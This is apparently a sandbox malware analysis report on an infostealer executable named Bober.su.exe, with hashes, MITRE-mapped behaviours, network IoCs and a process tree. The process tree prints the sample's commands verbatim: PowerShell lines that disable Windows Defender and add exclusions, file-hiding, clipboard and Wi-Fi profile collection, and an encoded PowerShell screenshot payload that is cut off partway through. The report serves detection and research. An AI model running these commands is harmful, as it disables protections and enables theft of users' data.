cbe72bddd72e482fe141a01202878031d3959f1e4df675872094e38d30f821ea

Analysis

max time kernel
95s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
06-12-2024 11:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Bober.su.exe
Size

7.4MB
MD5

6e546ac9997b820e109fd7b3b50a444b
SHA1

4ec0f21203a8c17bed27092749917298676a07cb
SHA256

cbe72bddd72e482fe141a01202878031d3959f1e4df675872094e38d30f821ea
SHA512

f3ba186d39df8e83052e93765ce8e9447f9a63c4654092a2b90b7f1ddbf539fd534a4020af0289d5fb572017fe44c268db48a46b294118585529f66e819b27ed
SSDEEP

196608:Er3l8PELjv+bhqNVoB0SEsucQZ41JBbIP11tJD:c8PEL+9qz80SJHQK1Jy1vJD

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2644	powershell.exe
3760	powershell.exe
464	powershell.exe
1956	powershell.exe
3360	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4304	cmd.exe
3704	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2116	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3540	Bober.su.exe
3540	Bober.su.exe
3540	Bober.su.exe
3540	Bober.su.exe
3540	Bober.su.exe
3540	Bober.su.exe
3540	Bober.su.exe
3540	Bober.su.exe
3540	Bober.su.exe
3540	Bober.su.exe
3540	Bober.su.exe
3540	Bober.su.exe
3540	Bober.su.exe
3540	Bober.su.exe
3540	Bober.su.exe
3540	Bober.su.exe
3540	Bober.su.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
24	discord.com
25	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
4740	tasklist.exe
1400	tasklist.exe
228	tasklist.exe
1836	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2204	cmd.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023ca9-21.dat	upx
behavioral2/memory/3540-25-0x00007FF989D40000-0x00007FF98A32E000-memory.dmp	upx
behavioral2/files/0x0007000000023c9c-27.dat	upx
behavioral2/memory/3540-30-0x00007FF99CC60000-0x00007FF99CC84000-memory.dmp	upx
behavioral2/files/0x0007000000023ca7-31.dat	upx
behavioral2/files/0x0007000000023ca6-33.dat	upx
behavioral2/memory/3540-48-0x00007FF99FC10000-0x00007FF99FC1F000-memory.dmp	upx
behavioral2/files/0x0007000000023ca3-47.dat	upx
behavioral2/files/0x0007000000023ca2-46.dat	upx
behavioral2/files/0x0007000000023ca1-45.dat	upx
behavioral2/files/0x0007000000023ca0-44.dat	upx
behavioral2/files/0x0007000000023c9f-43.dat	upx
behavioral2/files/0x0007000000023c9e-42.dat	upx
behavioral2/files/0x0007000000023c9d-41.dat	upx
behavioral2/files/0x0007000000023c9b-40.dat	upx
behavioral2/files/0x0007000000023cae-39.dat	upx
behavioral2/files/0x0007000000023cad-38.dat	upx
behavioral2/files/0x0007000000023cac-37.dat	upx
behavioral2/files/0x0007000000023ca8-34.dat	upx
behavioral2/memory/3540-54-0x00007FF99CC00000-0x00007FF99CC2D000-memory.dmp	upx
behavioral2/memory/3540-56-0x00007FF99CB10000-0x00007FF99CB29000-memory.dmp	upx
behavioral2/memory/3540-58-0x00007FF999DB0000-0x00007FF999DD3000-memory.dmp	upx
behavioral2/memory/3540-60-0x00007FF998BC0000-0x00007FF998D36000-memory.dmp	upx
behavioral2/memory/3540-64-0x00007FF99CE40000-0x00007FF99CE4D000-memory.dmp	upx
behavioral2/memory/3540-63-0x00007FF9994C0000-0x00007FF9994D9000-memory.dmp	upx
behavioral2/memory/3540-66-0x00007FF9990E0000-0x00007FF999113000-memory.dmp	upx
behavioral2/memory/3540-71-0x00007FF998DC0000-0x00007FF998E8D000-memory.dmp	upx
behavioral2/memory/3540-73-0x00007FF99CC60000-0x00007FF99CC84000-memory.dmp	upx
behavioral2/memory/3540-72-0x00007FF989810000-0x00007FF989D32000-memory.dmp	upx
behavioral2/memory/3540-68-0x00007FF989D40000-0x00007FF98A32E000-memory.dmp	upx
behavioral2/memory/3540-76-0x00007FF999340000-0x00007FF999354000-memory.dmp	upx
behavioral2/memory/3540-78-0x00007FF999DA0000-0x00007FF999DAD000-memory.dmp	upx
behavioral2/memory/3540-80-0x00007FF989200000-0x00007FF98931C000-memory.dmp	upx
behavioral2/memory/3540-105-0x00007FF999DB0000-0x00007FF999DD3000-memory.dmp	upx
behavioral2/memory/3540-106-0x00007FF998BC0000-0x00007FF998D36000-memory.dmp	upx
behavioral2/memory/3540-109-0x00007FF9994C0000-0x00007FF9994D9000-memory.dmp	upx
behavioral2/memory/3540-278-0x00007FF9990E0000-0x00007FF999113000-memory.dmp	upx
behavioral2/memory/3540-280-0x00007FF998DC0000-0x00007FF998E8D000-memory.dmp	upx
behavioral2/memory/3540-296-0x00007FF989810000-0x00007FF989D32000-memory.dmp	upx
behavioral2/memory/3540-304-0x00007FF989D40000-0x00007FF98A32E000-memory.dmp	upx
behavioral2/memory/3540-310-0x00007FF998BC0000-0x00007FF998D36000-memory.dmp	upx
behavioral2/memory/3540-305-0x00007FF99CC60000-0x00007FF99CC84000-memory.dmp	upx
behavioral2/memory/3540-348-0x00007FF989200000-0x00007FF98931C000-memory.dmp	upx
behavioral2/memory/3540-349-0x00007FF989810000-0x00007FF989D32000-memory.dmp	upx
behavioral2/memory/3540-358-0x00007FF998DC0000-0x00007FF998E8D000-memory.dmp	upx
behavioral2/memory/3540-357-0x00007FF9990E0000-0x00007FF999113000-memory.dmp	upx
behavioral2/memory/3540-356-0x00007FF9994C0000-0x00007FF9994D9000-memory.dmp	upx
behavioral2/memory/3540-355-0x00007FF99CE40000-0x00007FF99CE4D000-memory.dmp	upx
behavioral2/memory/3540-354-0x00007FF999DB0000-0x00007FF999DD3000-memory.dmp	upx
behavioral2/memory/3540-353-0x00007FF99CB10000-0x00007FF99CB29000-memory.dmp	upx
behavioral2/memory/3540-352-0x00007FF99CC00000-0x00007FF99CC2D000-memory.dmp	upx
behavioral2/memory/3540-351-0x00007FF99FC10000-0x00007FF99FC1F000-memory.dmp	upx
behavioral2/memory/3540-350-0x00007FF99CC60000-0x00007FF99CC84000-memory.dmp	upx
behavioral2/memory/3540-340-0x00007FF998BC0000-0x00007FF998D36000-memory.dmp	upx
behavioral2/memory/3540-347-0x00007FF999DA0000-0x00007FF999DAD000-memory.dmp	upx
behavioral2/memory/3540-346-0x00007FF999340000-0x00007FF999354000-memory.dmp	upx
behavioral2/memory/3540-334-0x00007FF989D40000-0x00007FF98A32E000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2588	cmd.exe
2836	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2596	cmd.exe
4876	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2704	WMIC.exe
3808	WMIC.exe
4160	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
604	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2836	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
1956	powershell.exe
2644	powershell.exe
2644	powershell.exe
1956	powershell.exe
3360	powershell.exe
3360	powershell.exe
3704	powershell.exe
3704	powershell.exe
1848	powershell.exe
1848	powershell.exe
3704	powershell.exe
1848	powershell.exe
3760	powershell.exe
3760	powershell.exe
4928	powershell.exe
4928	powershell.exe
464	powershell.exe
464	powershell.exe
2316	powershell.exe
2316	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1340	WMIC.exe
Token: SeSecurityPrivilege	1340	WMIC.exe
Token: SeTakeOwnershipPrivilege	1340	WMIC.exe
Token: SeLoadDriverPrivilege	1340	WMIC.exe
Token: SeSystemProfilePrivilege	1340	WMIC.exe
Token: SeSystemtimePrivilege	1340	WMIC.exe
Token: SeProfSingleProcessPrivilege	1340	WMIC.exe
Token: SeIncBasePriorityPrivilege	1340	WMIC.exe
Token: SeCreatePagefilePrivilege	1340	WMIC.exe
Token: SeBackupPrivilege	1340	WMIC.exe
Token: SeRestorePrivilege	1340	WMIC.exe
Token: SeShutdownPrivilege	1340	WMIC.exe
Token: SeDebugPrivilege	1340	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1340	WMIC.exe
Token: SeRemoteShutdownPrivilege	1340	WMIC.exe
Token: SeUndockPrivilege	1340	WMIC.exe
Token: SeManageVolumePrivilege	1340	WMIC.exe
Token: 33	1340	WMIC.exe
Token: 34	1340	WMIC.exe
Token: 35	1340	WMIC.exe
Token: 36	1340	WMIC.exe
Token: SeDebugPrivilege	1400	tasklist.exe
Token: SeDebugPrivilege	1956	powershell.exe
Token: SeDebugPrivilege	2644	powershell.exe
Token: SeIncreaseQuotaPrivilege	1340	WMIC.exe
Token: SeSecurityPrivilege	1340	WMIC.exe
Token: SeTakeOwnershipPrivilege	1340	WMIC.exe
Token: SeLoadDriverPrivilege	1340	WMIC.exe
Token: SeSystemProfilePrivilege	1340	WMIC.exe
Token: SeSystemtimePrivilege	1340	WMIC.exe
Token: SeProfSingleProcessPrivilege	1340	WMIC.exe
Token: SeIncBasePriorityPrivilege	1340	WMIC.exe
Token: SeCreatePagefilePrivilege	1340	WMIC.exe
Token: SeBackupPrivilege	1340	WMIC.exe
Token: SeRestorePrivilege	1340	WMIC.exe
Token: SeShutdownPrivilege	1340	WMIC.exe
Token: SeDebugPrivilege	1340	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1340	WMIC.exe
Token: SeRemoteShutdownPrivilege	1340	WMIC.exe
Token: SeUndockPrivilege	1340	WMIC.exe
Token: SeManageVolumePrivilege	1340	WMIC.exe
Token: 33	1340	WMIC.exe
Token: 34	1340	WMIC.exe
Token: 35	1340	WMIC.exe
Token: 36	1340	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4160	WMIC.exe
Token: SeSecurityPrivilege	4160	WMIC.exe
Token: SeTakeOwnershipPrivilege	4160	WMIC.exe
Token: SeLoadDriverPrivilege	4160	WMIC.exe
Token: SeSystemProfilePrivilege	4160	WMIC.exe
Token: SeSystemtimePrivilege	4160	WMIC.exe
Token: SeProfSingleProcessPrivilege	4160	WMIC.exe
Token: SeIncBasePriorityPrivilege	4160	WMIC.exe
Token: SeCreatePagefilePrivilege	4160	WMIC.exe
Token: SeBackupPrivilege	4160	WMIC.exe
Token: SeRestorePrivilege	4160	WMIC.exe
Token: SeShutdownPrivilege	4160	WMIC.exe
Token: SeDebugPrivilege	4160	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4160	WMIC.exe
Token: SeRemoteShutdownPrivilege	4160	WMIC.exe
Token: SeUndockPrivilege	4160	WMIC.exe
Token: SeManageVolumePrivilege	4160	WMIC.exe
Token: 33	4160	WMIC.exe
Token: 34	4160	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3396 wrote to memory of 3540	3396	Bober.su.exe	82
PID 3396 wrote to memory of 3540	3396	Bober.su.exe	82
PID 3540 wrote to memory of 2656	3540	Bober.su.exe	83
PID 3540 wrote to memory of 2656	3540	Bober.su.exe	83
PID 3540 wrote to memory of 2168	3540	Bober.su.exe	84
PID 3540 wrote to memory of 2168	3540	Bober.su.exe	84
PID 3540 wrote to memory of 4576	3540	Bober.su.exe	87
PID 3540 wrote to memory of 4576	3540	Bober.su.exe	87
PID 3540 wrote to memory of 5028	3540	Bober.su.exe	89
PID 3540 wrote to memory of 5028	3540	Bober.su.exe	89
PID 2656 wrote to memory of 1956	2656	cmd.exe	91
PID 2656 wrote to memory of 1956	2656	cmd.exe	91
PID 2168 wrote to memory of 2644	2168	cmd.exe	92
PID 2168 wrote to memory of 2644	2168	cmd.exe	92
PID 4576 wrote to memory of 1400	4576	cmd.exe	93
PID 4576 wrote to memory of 1400	4576	cmd.exe	93
PID 5028 wrote to memory of 1340	5028	cmd.exe	94
PID 5028 wrote to memory of 1340	5028	cmd.exe	94
PID 3540 wrote to memory of 972	3540	Bober.su.exe	96
PID 3540 wrote to memory of 972	3540	Bober.su.exe	96
PID 972 wrote to memory of 4904	972	cmd.exe	98
PID 972 wrote to memory of 4904	972	cmd.exe	98
PID 3540 wrote to memory of 3180	3540	Bober.su.exe	144
PID 3540 wrote to memory of 3180	3540	Bober.su.exe	144
PID 3180 wrote to memory of 3000	3180	cmd.exe	101
PID 3180 wrote to memory of 3000	3180	cmd.exe	101
PID 3540 wrote to memory of 4612	3540	Bober.su.exe	146
PID 3540 wrote to memory of 4612	3540	Bober.su.exe	146
PID 4612 wrote to memory of 4160	4612	cmd.exe	104
PID 4612 wrote to memory of 4160	4612	cmd.exe	104
PID 3540 wrote to memory of 4828	3540	Bober.su.exe	105
PID 3540 wrote to memory of 4828	3540	Bober.su.exe	105
PID 4828 wrote to memory of 2704	4828	cmd.exe	107
PID 4828 wrote to memory of 2704	4828	cmd.exe	107
PID 3540 wrote to memory of 2204	3540	Bober.su.exe	108
PID 3540 wrote to memory of 2204	3540	Bober.su.exe	108
PID 3540 wrote to memory of 3632	3540	Bober.su.exe	109
PID 3540 wrote to memory of 3632	3540	Bober.su.exe	109
PID 3632 wrote to memory of 3360	3632	cmd.exe	113
PID 3632 wrote to memory of 3360	3632	cmd.exe	113
PID 2204 wrote to memory of 1988	2204	cmd.exe	112
PID 2204 wrote to memory of 1988	2204	cmd.exe	112
PID 3540 wrote to memory of 2888	3540	Bober.su.exe	114
PID 3540 wrote to memory of 2888	3540	Bober.su.exe	114
PID 3540 wrote to memory of 4472	3540	Bober.su.exe	115
PID 3540 wrote to memory of 4472	3540	Bober.su.exe	115
PID 2888 wrote to memory of 228	2888	cmd.exe	118
PID 2888 wrote to memory of 228	2888	cmd.exe	118
PID 4472 wrote to memory of 1836	4472	cmd.exe	119
PID 4472 wrote to memory of 1836	4472	cmd.exe	119
PID 3540 wrote to memory of 748	3540	Bober.su.exe	120
PID 3540 wrote to memory of 748	3540	Bober.su.exe	120
PID 3540 wrote to memory of 4304	3540	Bober.su.exe	122
PID 3540 wrote to memory of 4304	3540	Bober.su.exe	122
PID 3540 wrote to memory of 4440	3540	Bober.su.exe	123
PID 3540 wrote to memory of 4440	3540	Bober.su.exe	123
PID 3540 wrote to memory of 4088	3540	Bober.su.exe	125
PID 3540 wrote to memory of 4088	3540	Bober.su.exe	125
PID 3540 wrote to memory of 2596	3540	Bober.su.exe	128
PID 3540 wrote to memory of 2596	3540	Bober.su.exe	128
PID 3540 wrote to memory of 3080	3540	Bober.su.exe	129
PID 3540 wrote to memory of 3080	3540	Bober.su.exe	129
PID 3540 wrote to memory of 1968	3540	Bober.su.exe	131
PID 3540 wrote to memory of 1968	3540	Bober.su.exe	131

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1988	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Bober.su.exe
"C:\Users\Admin\AppData\Local\Temp\Bober.su.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3396
- C:\Users\Admin\AppData\Local\Temp\Bober.su.exe
  "C:\Users\Admin\AppData\Local\Temp\Bober.su.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Bober.su.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2656
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Bober.su.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2168
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4576
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5028
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:972
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3180
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4612
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4828
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Bober.su.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:2204
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Bober.su.exe"
      4⤵
      Views/modifies file attributes
      PID:1988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3632
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2888
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4472
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:748
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4304
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4440
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4088
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2596
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3080
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAg